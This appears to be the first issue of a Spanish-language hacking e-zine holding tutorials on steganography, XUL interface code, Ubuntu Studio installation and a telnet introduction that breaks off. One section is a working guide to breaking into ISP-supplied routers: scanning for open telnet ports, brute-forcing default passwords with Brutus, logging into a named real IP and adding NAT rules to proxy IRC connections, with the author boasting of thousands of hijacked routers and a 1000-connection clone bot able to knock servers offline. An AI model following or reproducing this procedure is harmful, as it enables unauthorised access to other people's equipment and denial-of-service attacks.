Sunteți pe pagina 1din 96

Editorial

Esta Edicin # 1 de la E-zine Level-23 est dirigida a todas


aquellas personas que estn interesadas en aprender o
mejorar sus conocimientos en los distintos campos de la
informtica como lo son la programacin, la criptografa la
esteganografia, distintas tcnicas de hacking y algunos
temas que podrn ver en el desarrollo de esta revista, que
solo pretende exponer estos temas de carcter educativo
en ningn momento pretende incitar a llevar acabo delitos,
cada persona es lo suficiente consciente de que es bueno y
que es malo por lo tanto deben asumir las consecuencias de
sus actos. Adems de nuestros colaboradores de la revista
pretenden compartir sus conocimientos con aquellos
interesados en hacerlo.

Agradecemos a todos aquellos participantes de este


proyecto que venimos tratando de hacer desde hace meses
y que fue interrumpido ya todos sabemos las razones y pues
decidimos continuar con este proyecto y hoy estamos
contentos de poder presentarles a ustedes esta edicin,
fueron muchos los das y noches de esfuerzos por todos
aquellos integrantes por eso les agradezco por su
compromiso con level-23.org.

Un agradecimiento especial a todos aquellos usuarios de


www.level-23.com quienes han estado esperando
ansiosamente esta ebook, por su paciencia y fidelidad con
el sitio.

Atentamente C4x30x - Director E-zine Level-23


CONTENIDO

Esteganografa
* Manual Esteganograf

* Manual xul

* Intrusion a un Router Mediante Telnet

* Instalar UbuntuStudio

* Telnet y ssh

* XSS TUNELING

* Introduccin a XSS
Introducci

* Curso Bsico de Programaci


Programacin en HTML y CSS

* Manual Inyeccion Sql

* Arquitectura de Computadores

* Manual Phiser Rapidshare 2009

* Manual Phiser Megaupload 2009


Esteganografa
Esteganograf
Para comenzar debemos de saber el significado de esta tcnica

Esteganografa.- o empleo de canales subliminales proviene del griego.


La Esteganograf
steganos(secreto) y grafa (escribir). Y su definicin es: La escritura secreta

Antes de continuar explicndoles como funciona esta tcnica tambin debemos


de conocer la siguiente:

Criptograf
Criptografa.- el arte de ocultar. La palabra tiene su origen en el griego. kryptos
(oculto, escondido) y graphein (escribir). Y su definicin es: Arte de escribir
con clave secreta o de un modo enigmtico

Gracias a esta ciencia o artes aprenderemos a ocultar nuestros mensajes de la


vista de otras personas. cabe sealar que mucha gente cofunde la
Esteganografa con la Criptograf
Esteganograf Criptografa por su parecido en cuanto al objetivo final
pero debemos de ser capaces de distinguirlas muy fcilmente debido a que el
objetivo de la criptografa no es de ocultar el mensaje sino mas bien mediante
sus algoritmos de encriptacin hacerla ilegible a las personas.

En muchas ocasiones es necesario juntar estas dos tcnicas para tener un


resultado ptimo ya que si nuestro mensaje es interceptado sin la clave de
encriptacin no podrn hacer nada y nuestra informacin permanecer segura.

Una mencin especial merece el uso de la Esteganografa para exportar


informacin sin violar las leyes restrictivas que, con respecto a la Criptografa
fuerte, existen en algunos pases. Un ejemplo seria enviar un mensaje con texto
claro, pero entremezclado con cantidades ingentes de basura. El destinatario
empleara tcnicas esteganograficas para separar la informacin til del resto.
Esta tcnica se conoce como chaffing and winnowing
winnowing, que vendra a traducirse
como llenar de paja y separar el grano de la paja.

Este sistema surgi en marzo de 1998, propuesto por Ronald L. Rivest uno de
los creadores de RSA, como desafi a la poltica restrictiva del Gobierno de los
EE.UU. con respecto a la Criptografa. No deja de ser en cierto modo una
curiosidad, debido a lo enormemente grandes que son los mensajes en
comparacin con la cantidad de texto til que se puede incluir en ellos.

Continuando con nuestra tcnica supongamos que queremos enviar un mensaje


secreto a un amigo y no queremos que nadie sospeche que se le esta enviando
mas informacin de lo que a simple vista se observa.
En realidad existen infinidad de mtodos que se encuentran limitados solo por la
imaginacin de cada uno.

En este caso podramos enviarle una imagen y dentro de la imagen colocar


nuestro mensaje, a simple vista todos observaran la imagen pero ignoraran que
dentro de ella se encuentra nuestra informacin secreta, ahora asumiendo que
una persona externa conociera el mtodo empleado para camuflar nuestro
mensaje, ah nuestra informacin estara corriendo un grave riesgo y
tendramos que utilizar la criptografa para proteger nuestra informacin pero
podemos utilizar la siguiente tcnica chaffing and winnowing para mandar
muestro mensaje original entremezclado con la basura que hayamos llenado y
solo quien disponga de la clave estara en condiciones de recuperar el mensaje
original

Creo que ya es suficiente teora para entender bien la Esteganografa y su


diferencia notoria o claramente distinguida con la criptografa, ya solo nos
queda ir ahora a la practica entonces manos a la obra

Ahora lo que har es introducir un mensaje dentro de una imagen de esa forma
todos vern la imagen y no sospecharan de la informacin adicional que hay,
para ello necesitare tener 3 archivos que los tendremos dentro una misma
carpeta:

Imagen.jpg : pantalla que utilizaremos para ocultar nuestra informacion


Mensaje.txt : informacin que vamos a ocultar este es un ejemplo de
esteganografia
Separador.txt : separador para encontrar nuestro mensaje AB--//ba
Ahora debemos de abrir el cmd para hacer esto debemos presionar la tecla
windous + R y escribiremos cmd, ahora nos ubicamos en la carpeta que
contiene nuestros archivos y escribimos lo siguiente dentro de nuestra consola
que hemos abierto y presionamos enter

Lo que estamos haciendo es copiar de forma binaria (copy /b) nuestro mensaje
a la imagen
Ahora ejecutamos nuestro editor hexadecimal en mi caso utilizare Hex
Workshop y abrimos nuestra imagen y buscamos el contenido de nuestro
separador AB--//ba

Una vez encontrado nuestro texto separador vemos nuestro mensaje secreto
que en este caso es este es un ejemplo de esteganografia.
En este ejemplo introduje nuestro mensaje al final de los datos de la imagen
pero aun as este mensaje es muy fcil de interceptar lo ideal hubiese sido
haber introducido fragmentos de nuestro mensaje con nuestro separador y
haber introducido mas informacin (spam) haciendo uso de la tcnica chaffing
and winnowing antes mencionada pero siempre se debe de empezar con
ejemplos bsicos y simples para despus seguir con los mas complejos

Tambin se pudo usar la criptografa para hacer ilegible nuestro mensaje eso ya
es a cuenta de la imaginacin y el grado de seguridad que le quieran dar.

Bueno con esto me despido y espero haberles ayudado a comprender el uso de


esta tcnica y diferenciarla de la criptografa

Propiedad de www.level-23.com

Autor : Shevchenko
Manual Xul
Hola a todos soy Shevchenko y pertenezco a la comunidad level-23 este es mi
primer manual sobre XUL y tambin la primera entrega comenzare
respondindoles Qu es XUL?

XUL es un lenguaje basado en XML para el desarrollo de interfaces de usuario


multiplataforma del que se dice ser la pesadilla de .NET de Microsoft. Su
nombre deriva de las siglas de XML-based User-interface Language y fue
creado por la gente del proyecto Mozilla apoyndose en su motor de
renderizado, Gecko, que se encarga tanto del visualizado de webs como de la
construccin de la interfaz de usuario.

En esta entrega hablare un poco sobre la creacin de archivos XUL y los


elementos bsicos que podemos aadirle.

La estructura de un archivo XUL es bastante simple y fcil. Solo necesitamos un


editor de texto en Windows (Block de notas, etc.) y en Linux (Gedit, Kwrite, etc.).
Para poder visualizar nuestros archivos en XUL debemos de tener instalado un
navegador web con motor gecko yo les recomiendo que usen Firefox y creo que
no hace falta decir que IE no sirve.

No nos olvidemos que debemos de guardar el archivo con extensin .xul.

<?xml version="1.0"?>
<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>

<window
id="ventana"
title="Ejemplo XUL"
orient="horizontal"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
...
</window>

Esta ventana no hace nada, ya que no contiene ningn elemento.

1. <?xml version="1.0"?>
Esta lnea declara simplemente que se trata de un archivo XML.

2. <?xml-stylesheet href="chrome://global/skin/" type="text/css"?>

Esta lnea se utiliza para especificar las hojas de estilo que va a utilizar para el
archivo. Puede incorporar mas lneas haciendo referencia a su hoja de estilo
3. <window

Esta lnea crea la interfaz de Xul y es similar al body de html

4. id="ventana"

El atributo id se utiliza como un identificador para que la ventana puede ser


contemplado por los scripts.

5. title="Ejemplo XUL"

El ttulo describe el atributo de texto que aparece en la barra de ttulo de la


ventana cuando se muestra. En este caso, el texto aparecer "Ejemplo XUL".

6. orient="horizontal"

Especifica como estar la disposicin de los elementos en la ventana.

7.xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

Esta lnea declara el nombre para XUL, lo que se debera poner en la ventana de
elemento que indique que todos sus hijos son XUL. Mozilla va a reconocer esta
URL internamente.

8. ...

Aqu es donde los elementos (botones, mens y otros componentes de interfaz


de usuario).

9. </window>

Y, por ltimo, tenemos que cerrar la ventana etiqueta al final del archivo.

Ahora que ya conocemos lo elemental de un archivo XUL vamos a aadirle


algunos elementos

Aadiendo un bot
botn Etiqueta <button>

<button
="boton"
id="boton"
id
="dialog"
class="dialog"
class
="OK"
label="OK"
label
="image.jpg"
image="image.jpg"
image
="true"
disabled="true"
disabled
="t"
accesskey="t"
accesskey />
="t"/>
Los atributos son los siguientes, todos los cuales son opcionales:

Id: Un identificador nico para el botn. Ver este atributo en todos los
elementos.

Class: Identificador de clase para el botn. Esto funciona igual que en HTML y lo
podemos utilizar para cambiarle atributos con hojas de estilo (CSS).

Label: El nombre que aparecer en el botn es como el value en HTML. Por


ejemplo, Aceptar o Cancelar.

Image: La URL de la imagen para que aparezca en el botn. Los botones en si no


son muy agradables visualmente por eso existe este atributo que funciona igual
que en HTML

Disabled: Solo existen dos estados (True y False), trae el botn esta
habilitado y false desactivado o deshabilitado

Accesskey: Tecla de acceso rpido se presiona ALT + la letra subrayada. En el


ejemplo se coloco la letra t y como esta letra no esta en el label (etiqueta) del
botn aparece entre parntesis la letra que pusimos. Ahora colocando la letra
o y el botn habilitado se visualiza asi:

Aadiendo texto Etiqueta <label>


La forma ms bsica para incluir texto en una ventana es utilizar la etiqueta
label.

<label value="Bienvenidos a Level-23"/>


Ejemplo sin value
<label>Bienvenidos a Level-23</label>
La etiqueta label tambin posee el atributo class para poder editarlo mediante
CSS y mejorar su estilo.

Aadiendo im
imgenes Etiqueta <Image>

Al igual que HTML, XUL tiene un elemento para mostrar imgenes dentro de una
ventana. Puede utilizar el atributo src para especificar la URL del archivo de
imagen. El ejemplo siguiente muestra esto:
<image src="banner.jpg"/>
Su funcionamiento es igual que <img> en HTML

Aadiendo cuadro de texto Etiqueta <textbox>

HTML tiene un elemento de entrada que pueden ser utilizados para los controles
de entrada de texto. XUL tiene un elemento similar, de texto, utilizadas para el
mismo proposito. Sin ningn atributo, el elemento de texto crea un cuadro en el
que el usuario puede introducir texto. Esta etiqueta tambien posee los mismos
atributos como los controles de entrada HTML. Las siguientes son algunas de
ellas:

Type: Esto normalmente se usa para introducir contraseas.

Maxlength: El nmero mximo de caracteres que permite el cuadro de texto.


Maxlength

<textbox id="txtIngreso" width="250px" height="25px"> </textbox>

Ahora veamos un ejemplo con lo que hemos aprendido hasta ahora

<box>
<vbox>
<hbox>
<label value="Ingrese Texto" flex="1"/>
<textbox id="texto-ingresado"/>
</hbox>
<hbox>
<label value="Ingrese Password" flex="1"/>
<textbox id="pass-ingresado" type="password" maxlength="8"/>
</hbox>
</vbox>
</box>

Desde ahora dejo un poco el discurso y empezamos ms con los ejemplos que
es la mejor forma de aprender

<textbox multiline="true"
value="En esta caja de texto se podra escribir varias lineas."/>

Checkbox y Radio Buttons Etiqueta <checkbox> y Etiqueta <radiogroup>

Dos elementos adicionales que se utilizan para la creacin de casillas de


verificacin y botones de seleccin. Se utiliza para las opciones que puede ser
activado o desactivado.

El ejemplo siguiente muestra algunas sencillas casillas de verificacin y botones


de radio.

<checkbox id="chkbox1" checked="true" label="Seleccionado"/>


<checkbox id="chkbox2" checked="false" label="No seleccionado"/>
<radiogroup>
<radio id="Rojo" label="Rojo"/>
<radio id="Verde" selected="true" label=" Verde "/>
<radio id="Azul" label=" Azul "/>
</radiogroup>

List Controls Etiqueta <listbox>

Un cuadro de lista se utiliza para mostrar una serie de elementos. El usuario


puede seleccionar un elemento de la lista.

XUL proporciona dos tipos de elementos para crear listas, una lista para crear
mltiples hileras, y un elemento menulist para crear la lista desplegable cajas.
Ellos funcionan de manera similar al HTML, pero los elementos XUL tienen
caractersticas adicionales.

Por ejemplo, este cuadro de lista tendr cuatro filas, una para cada tema.

<listbox>
<listitem label="Opera"/>
<listitem label="Firefox"/>
<listitem label="Chrome"/>
<listitem label="IE"/>
</listbox>
Multi-Column List Boxes

La lista tambin soporta mltiples columnas. Cada celda puede tener contenido
dentro de ella.

Dos etiquetas se utilizan para especificar las columnas en la lista. El elemento


listcols se utiliza para la columna de informacin, cada una de las cuales se
especifica mediante un elemento listcol. Usted necesitar un elemento listcol
para cada columna en la lista.

El listcell elemento puede ser utilizado para cada celda en una fila. Si desea
tener tres columnas, usted tendr que agregar tres elementos listcell dentro de
cada ListItem. Para especificar el contenido de texto de una celda, coloque una
etiqueta en un atributo listcell. Por el simple caso de que slo hay una columna,
tambin puede colocar la etiqueta de atributos directamente en el elemento
ListItem y dejar el listcell a cabo por completo, como se vio en la anterior lista de
ejemplos.

El ejemplo siguiente es de una lista con dos columnas y tres filas:

<listbox>
<listcols>
<listcol/>
<listcol/>
</listcols>
<listitem>
<listcell label="Rosario"/>
<listcell label="22 aos"/>
</listitem>
<listitem>
<listcell label="Jennifer"/>
<listcell label="23 aos"/>
</listitem>
<listitem>
<listcell label="Alejandra"/>
<listcell label="21 aos"/>
</listitem>
</listbox>

Header Rows

Tambin permiten una lnea de encabezamiento. Esto es mucho como una lnea
regular, salvo que se muestra diferente. Usted podra utilizar esto para crear
cabeceras de columna. Dos nuevos elementos que se utilizan.

El elemento listheader se utiliza para cada celda en la fila de ttulos.

Aqu est el ejemplo anterior con una lnea de encabezamiento:

<listbox>
<listhead>
<listheader label="Nombre"/>
<listheader label="Ocupacin"/>
</listhead>

<listcols>
<listcol/>
<listcol flex="1"/>
</listcols>
<listitem>
<listcell label="Rosario"/>
<listcell label="Mi novia"/>
</listitem>
<listitem>
<listcell label="Jennifer"/>
<listcell label="Estudiante"/>
</listitem>
<listitem>
<listcell label="Alejandra"/>
<listcell label="Sistemas"/>
</listitem>
</listbox>
Comenzamos ahora con la practica realizando una calculadora, pero xul solo
sirve para hacer el interface (pantallazo) por eso usaremos javascript para
realizar las operaciones.

Copien el cdigo en un block de notas y gurdenlo pero no se olviden que debe


de tener extensin .xul

Calculadora.xul

<?xml version="1.0" encoding="utf-8"?>


<?xml-stylesheet href="chrome://global/skin" type="text/css"?>
<?xml-stylesheet href="estilo.css" type="text/css"?>

<window id="calculadora"
title="Calculadora"
xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

<script src="funcion.js"/>

<box flex="1" id="fondo" pack="center" style="overflow:auto;">


<hbox>
<vbox pack="center">
<groupbox>
<groupbox align="center" pack="center" >
<separator style="height:5px"/>
<label value=" CALCULADORA " style="font-family:Arial; -moz-border-
radius:8px;font-weight:bold;background-color:#000000;color:#DB974D;font-
size:12px;padding:6px;border-top: 5px solid #BFBFBF; border-left: 5px solid
#BFBFBF; border-bottom: 5px solid #BFBFBF;border-right: 5px solid
#BFBFBF;"/>
<separator style="height:5px"/>
</groupbox>
<groupbox align="right">
<hbox>
<label id='texto' flex='1' value='0' align="right" style='font-
size:24px;color:#fff;font-weight:bold;'/>
</hbox>
</groupbox>
<groupbox>
<hbox>
<vbox align='center'>
<label id='memoria' value='' style='height:26px;color:#fff;font-weight:bold;'/>
<button id='texto' label='MC' style='width:50px;color:#f00'
oncommand="delMemoria()"/>
<button id='texto' label='MR' style='width:50px;color:#f00'
oncommand="impMemoria()"/>
<button id='texto' label='MS' style='width:50px;color:#f00'
oncommand="guardaMem()"/>
<button id='texto' label='M+' style='width:50px;color:#f00'
oncommand="guardaMem()"/>
</vbox>
<vbox>
<hbox>
<button id='retro' label='Retroceso' flex='1' style='color:#f00'
oncommand="retro()"/>
<button id='limpiar' label='CE' flex='1' style='color:#f00'
oncommand="limpiarTodo()"/>
<button id='limpia' label='C' flex='1' style='color:#f00' oncommand="limpiar()"/>
</hbox>
<hbox>
<button id='7' label='7' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='8' label='8' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='9' label='9' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='div' label='/' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='raiz' label='sqrt' style='width:30px;color:#00f'
oncommand="raiz(this.label)"/>
</hbox>
<hbox>
<button id='4' label='4' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='5' label='5' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='6' label='6' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='mul' label='*' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='por' label='%' style='width:30px;color:#00f'
oncommand="porcentaje()"/>
</hbox>
<hbox>
<button id='1' label='1' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='2' label='2' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='3' label='3' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='men' label='-' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='ter' label='1/x' style='width:30px;color:#00f'
oncommand="fraccion()"/>
</hbox>
<hbox>
<button id='0' label='0' style='width:30px;color:#00f'
oncommand="imprimir(this.label);"/>
<button id='signo' label='+/-' style='width:30px;color:#00f'
oncommand="cambiaSigno(this.label)"/>
<button id='punto' label='.' style='width:30px;color:#00f'
oncommand="impPunto(this.label)"/>
<button id='mas' label='+' style='width:30px;color:#f00'
oncommand="opera(this.label)"/>
<button id='igual' label='=' style='width:30px;color:#f00' oncommand="igual()"/>
</hbox>
</vbox>
</hbox>
</groupbox>
</groupbox>
</vbox>
</hbox>
</box>
</window>
Solo explicare las nuevas etiquetas utilizadas y atributos importantes.
Recuerden que Xul esta basado en XML y si se abre una etiqueta debes de
cerrarla, existen 2 formas de cerrar una etiqueta abierta:

Forma corta

<etiqueta />

Forma larga

<etiqueta> <etiqueta/>

Xul tambin permite utilizar las hojas de estilo (CSS) y para usarlas debemos de
incorporar la siguiente lnea de cdigo donde href ira la ruta de nuestra hoja de
estilo

<?xml-stylesheet href="estilo.css" type="text/css"?>

Como dije antes xul solo es la pantalla que visualizamos y si queremos realizar
algn proyecto debemos de utilizar javascript

<script src="funcion.js"/>

En xul tambin existen los contenedores con lo que podemos ordenar los
botones de manera horizontal (hbox) y vertical (vbox)

Es el contenedor principal su uso es opcional


<box flex="1" id="fondo" pack="center" style="overflow:auto;">

<hbox> todos los elementos que coloquemos dentro de esta etiqueta se


ordenaran en forma horizontal </hbox>

<vbox pack="center"> en este caso se ordenaran en forma vertical y por el


atributo colocado estar de forma centrada a la ventana </vbox>

<groupbox> este contenedor muestra un contorno donde podemos ver que


elementos tiene agrupado y tambin nos permite asignarle un titulo visible
</groupbox>

Para usar una funcin de javascript en xul haremos uso de la etiqueta button y
de sus eventos: oncommand, onclick, etc.

<button id='mas' oncommand="opera(this.label)"/>


Para referenciar un objeto de xul en javascript usamos
'Id-xul')
document.getElementById donde hacemos referencia por su ID ('Id-xul')
seguido de la propiedad del mismo que puede ser: label, value, hidden, etc.,
ejemplo:

document.getElementById('Id-xul').value

Les voy a dejar todo el ejemplo para que lo puedan descargar y probar

P.D.: No se por que siempre que alguien te ensea un nuevo lenguaje siempre
acabas realizando una calculadora XD

En nuestra segunda parte profundizaremos ms sobre el uso de los elementos,


adems crearemos una conexin con PHP

Espero que esta primera entrega haya despertado en ustedes vuestra


curiosidad e inters de aprender XUL

Si te interesa conocer mas sobre XUL puede visitar www.xulplanet.com o ser


parte de nuestra comunidad www.level-23.com registrndote a nuestro foro.

Propiedad de www.level-23.com

Autor : Shevchenko
Intrusin a un router mediante telnet
Intrusi

ndice
1. Introducci
Introduccin

2. Lo que necesitaremos

teora
3. Un poco de teor

4. Un Ejemplo Practico Real

1. INTRODUCCIN
INTRODUCCI

telef
Hace ya unos aos en la compaa telef nica
telef nica tuvieron la brillante idea de dejar el
puerto 23 abierto en los routers que regalaban cuando contratabas sus servicios de
Internet para as si les surga algn problema con la configuracin de ese router no
tener que desplazarse para repararlo y poder hacerlo conectndose al router mediante
telnet, teniendo en cuenta esto y que muchos de los usuarios de esos routers bien por
desconocimiento o por simple dejadez no cambian el usuario y contrasea que el
router trae por defecto, con esto nos encontramos que lo mismo que los de telef telef
telefnica
nica
pueden entrar a esos routers nosotros tambin ; )

2. LO QUE NECESITAMOS

Necesitaremos saber las ips vulnerables, que tipo de router utilizan y el usuario y la
contrasea para poder conseguir entrar en ellos.

Lo primero es escanear rangos de ips de esta compaa buscando las que


tengan el puerto 23 abierto, esto lo podemos hacer con el programa ipscan
descargar desde aqu http://www.megaupload.com/es/?d=OFR8N450 , Lo
segundo es saber que tipo de routers colocaban por aquellas fechas (eso ya os
lo digo yo, se llamaban 3com
3com). En tercer lugar necesitaremos saber cuales son
los usuarios y contraseas que utilizan esos routers por defecto, podis ver
algunas desde este sitio web: http://www.newbie.cl/nb/2008/08/11/contrasena-
por-defecto/ Y por ultimo necesitaremos un programa que sea gil probando en
esas ips los usuarios y contraseas para saber en cuales
podemos entrar, existen varios programas de brute force con los que podis hacer esto,
el brutus seria una buena eleccin, descrgalo desde aqu
http://www.megaupload.com/es/?d=4GTZNN1Z . Creo que con todo esto no tengis
problema para conseguir una buena lista de ips con sus user y pass (os puedo decir
que yo tengo miles que a da de hoy funcionan)

3. UN POCO DE TEORIA

Una vez tengamos alguna ip con su respectivo usuario y contrasea es cuestin


de ir a inicio/ejecutar y ponemos telnet ip ejemplo: telner 125.125.125.00 y le
damos a aceptar, con esto se nos abrir la consola y lo primero nos pedir el
usuario, lo ponemos y pulsamos enter, despus nos medir la contrasea, la
escribimos (ojo que no se vera lo que estamos poniendo) pero lo escribimos de
todas formas y le damos a enter, si todo salio bien nos dar la bienvenida y ya
estaremos dentro del router si tecleamos el comando help nos listara los
comandos disponibles, podemos seguir navegando dentro de las opciones del
router atravs del comando help ejemplo: help ADD que

es el primer comando que aparece en la lista.


Apartir de aqu es cosa de cada uno la intencin que tenga de lo que quiere hacer
dentro.

4. UN EJEMPLO PRACTICO REAL

Bueno, vamos a intentar mapear un puerto dentro de este router para redirigirlo a un
servidor de IRC y as ocultar nuestra ip conectndonos atravs de el.

Primero abrimos una conexin de Telnet en la consola con la ip, en este caso con
80.32.109.73 y nos logueamos (todo esto como vimos en el punto 3) una vez hecho esto
intentaremos redirigirle el puerto 5555 en direccin al servidor de IRC para ello
utilizaremos los siguientes comandos. (Lo resaltado en gris son los comandos a
introducir)

Mandamos un comando de preaviso al router de lo que queremos hacer:

enable ip wan_to_wan_forwarding

Despus mandamos el comando con los datos de lo que queremos:

add nat tcp vc internet public_port 5555 private_port 6667 private_address 149.9.1.16

Si nos fijamos en el comando anterior el 5555 es el puerto que vamos a abrir en el


router y 149.9.1.16 6667 son la ip y puerto a donde queremos que seale (esta
direccin y puerto apuntan a dalnet).

Una vez introducido el comando anterior nos pedir que salvemos los cambios,
tecleamos lo siguiente:

save all

Y para que surjan efecto los cambios debemos rebotear el router:

reboot

Nos pedir confirmacin para esto:

Yes

Esperamos unos segundos, salimos de la consola y ya tenemos el puerto 5555 de este


router apuntando a un servidor de IRC.

Vista de lo hecho asta ahora:


Con esto abrimos nuestro MIRC y ponemos:

/server 80.32.109.73 5555

Y nos conectaremos al servidor de IRC.

Bueno pues ya tenemos todo hecho nos hemos fabricado un Proxy para conectarnos al
IRC con una ip distinta a la nuestra y as poder permanecer en el anonimato, muestro
una captura:

En la imagen vemos como el nick de arriba aparece con mi ip real, en cambio el nick de
abajo tambin soy yo pero conectndome atravs del router al que terminamos de
mapear el puerto, y os preguntareis tanto trabajo

para tan solo ocultar nuestra ip en el IRC, pues os explico, en la mayora de se


servidores de IRC no se permite la entrada de mas de dos o tres nicks por ip, con lo
cual mediante este proceso podemos saltarnos esta norma, imaginen que metemos 100,
no 1000, saben lo que se podra hacer con tal numero de conexiones, se podra tumbar
el servidor entero.

Yo personalmente me programe en mircscripting un clonador con el cual consegua


meter ms de mil de estas ips en el IRC, una capturita:
Esto es solo una de las utilidades que se les puede dar a estos routers, pero quien sabe,
se podra intentar conectarlos a una web o quizs se podra sacar algn beneficio con
ellos, nunca me pare a pensarlo.

Autor : Stop
Instalar UbuntuStudio
En este manual les mostraremos como instalar UbuntuStudio en Ubuntu desde
los repositorios sin afectar a Windows.

Para este manual no necesitamos tener los conocimientos de particiones de


disco duro, tambin sirve para todos esas personas que no tengan unidad de
DVD en su computadora.

Cual Ubuntu es correcto para nuestra computadora?

AMD Athlon 1000+ 512 Gbyte de memoria RAM Tarjeta de vdeo nVidia
GeForce2 400 MX AGP con 64 MBytes Monitor TFT de 17 HP pavilion vs17 Placa
base Gygabyte GA-7IXEH con chipset VIA KT133 Discos duros: 1 de 40 GBytes
Seagate ATA, 1 de 13 GBytes Seagate ATA Regrabadora CD Plextor Tarjeta de
Sonido: Creative Soundblaster Live! PCI Teclado Logitech Cordless Keyboard
Adaptador Wifi ZyDAS 802.11 b/g USB (proporcionado por Jazztel)

AMD Athlon 64 3000+ 1 Gbyte de memoria RAM Tarjeta de vdeo nVidia GeForce
7600 GS (G70) PCI-Express con 512 MBytes Monitor TFT de 17 HP pavilion
f1723 Placa base Gygabyte GA-K8N Ultra-9 con chipset nVidia nForce4 Discos
duros: 1 de 120 GBytes Seagate SATA, 1 de 250 GBytes Seagate SATA
Regrabadora DVD Nec Tarjeta de Sonido: Creative Soundblaster 128 PCI
Webcam USB Logitech QuickCam Connect Teclado Logitech Cordless
Keyboard S510 Impresora HP 930C USB

Instalando Ubuntu en Windows.

luego que pongamos el CD en la computadora nos saldr una ventana como


esta:
Le daremos a Run umenu.exe y luego nos saldr una ventana como esta:

Para los que no sepan ingles les voy a traducir las 3 opciones que se muestran
para que as puedan tener una idea.

Prueba Ubuntu sin instalarlo! simplemente reinicie el su computadora con el CD


dentro de la unidad. Puede realizar una instalacin completa desde la
demostracin para instalar Ubuntu junto con Windows, o bien como su nico
sistema operativo instalado en su computadora.

Instala y desinstala Ubuntu como si fuera otra aplicacin, sin necesidad de una
particin dedicada. al arrancar el equipo, podr iniciar Windows o Ubuntu,En
este modo, la hibernacin no est habilitada y el rendimiento del disco se
reduce ligeramente.

Ubuntu es un sistema completamente libre basado en Linux y desarrollado por


la comunidad, que dispone de un navegador de web, sofware de productividad,
mensajera instantnea y mucho ms.

Ahora que ya sabemos lo que son las tres opciones le vamos a dar a install
inside windows luego que le demos a la opcin pasaremos a la siguiente
ventana:

Unidad para la instalacin: aqu escogeremos en que unidad de disco duro


instalaci
queremos que se instale eso s, si tienes 2 disco duro si no pues normalmente es
el C: no se preocupen esto no daara nada de su Windows solo que tiene que
estar pendiente al espacio libre en su disco duro.

Tamao de la instalaci
Tama n: Bueno ah escogeremos la cantidad de espacio que
instalaci
queremos que tenga nuestro Ubuntu lo mnimo son 4 pero escojan mas as
tendrn mas espacios para instalar las aplicaciones que quieran.

Entorno de escritorio: por el momento en el CD slo podemos elegir el entorno


grafico (GNOME).

Idioma: Mmmm escoge el idioma de tu preferencia.

Usuario: Por defecto nos vendr el mismo usuario que tienes en Windows, pero
tranquilo puedes cambiarlo. El usuario es el nombre con el que iniciaras sesin
en Ubuntu.

Contrasea: Pondremos la contrasea que usaremos para iniciar sesin y


Contrase
usaremos como root.

Luego que haigamos terminado de llenar los datos le damos a instalar. Luego
nos saldr la prxima ventana.
An el sistema no se est instalando. Lo que est haciendo es preparar unos
archivos temporales de instalacin para la segunda fase, que ser la que s
haga la instalacin como tal.

ahora cuando termine le damos a Reiniciar ahora.

luego que la computadora reinicie nos saldr una ventana como esta:
Nos da 2 opciones para escoges sale Windows y Ubuntu en este caso
escogemos Ubuntu.

Ahora nos mostrar otro men de seleccin, en esta ocasin vamos a escojer
menu.lst. Elegimos la primera opcin que vemos en la imagen y le damos
ENTER.

Ahora Ubuntu estara iniciandose.


despus que termine de llenarse la barra naranja nos saldr una venta con el
progreso de la instalacin en este caso no tendremos que hacer Nada solo
esperar que termine y listo.

Ahora solo reiniciamos la computadora y nos saldr de nuevo la ventana para


escoger que sistema operativo usar tambin ahora escogeremos Ubuntu.
Ahora Ubuntu nos subir ya normal que que hemos instalado el sistema
operativo con existo

Nos logeamos y estaremos en el desktop.

Instalando UbuntuStudio desde los repositorios en Ubuntu.

Bueno ya adentro de Ubuntu vamos a:Sistema => administracin => gestor de


paquetes synaptic
Nos
saldr una venta en ella pondremos el password que pusimos para logearnos
para entrar en Ubuntu.
Luego nos pasaremos a la siguiente ventana.
Ahora vamos a buscar en la lista ubuntustudio-desktop le damos clic derecho y
escogemos la opcin marcar para instalar.

Aparece un cuadro de dialogo donde nos avisa que componentes se van ah


instalar le damos marcar.
Luego le damos a Marcar

luego aqu bien la parte opcional ya que todo depende de nuestras necesidades
instalando el tipo de paquetes que necesitemos ya sea para produccin de
audio, vdeo o de imgenes.

para instalar la paquetera de edicin de vdeo marcamos (de la misma forma


que marcamos ubuntustudio-desktop), ubuntustudio-video.
Para instalar la paquetera de edicin de imgenes marcamos, ubuntustudio-
graphics
y para instalar la paquetera de edicin de audio marcamos, ubuntustudio-audio
y ubuntustudio-audio-plugins.
Lo que esta de color verde es lo que hemos escojido para instalar en nuestro
Ubuntu. Vuelve a salir el cuadro de dialogo avisndonos lo que se va a instalar, y
de nuevo de le damos clic en marcar.
Luego nos saldr otra ventana como esta:

y nuevamente le damos a Aplicar.

Luego se estaran descargando los paquetes.


Luego que se descargen se estarn instalando en nuestra computadora.

luego que termine solo resta reiniciar la computadora y volver a entrar y ya


tendremos nuestro UbuntuStudio instalado.
Bueno eso ha sido todo por hoy si tienes una duda o te gustara ver manuales asi
puedes pasarte por nuestra web http://level-23.com/ con mucho gusto te
resiviremos

Autor: UnknownShadow
Telnet y ssh
Telnet es el gnesis cuanto a conexiones se refriere, en la antigedad cuando
no haba exploradores funcionales como FireFox, Opera etc, o no tan
funcionales como IE, los habitantes del Cyber-mundo tenan que conformarse
con una simple consola y un protocolo antiguo pero poderoso para conectarse a
la telaraa mundial llamado Telnet

Breve introduccin a Telnet:


introducci

El Tel
Telecommunication Net
Network (Telnet) es un protocolo de red que sirve para
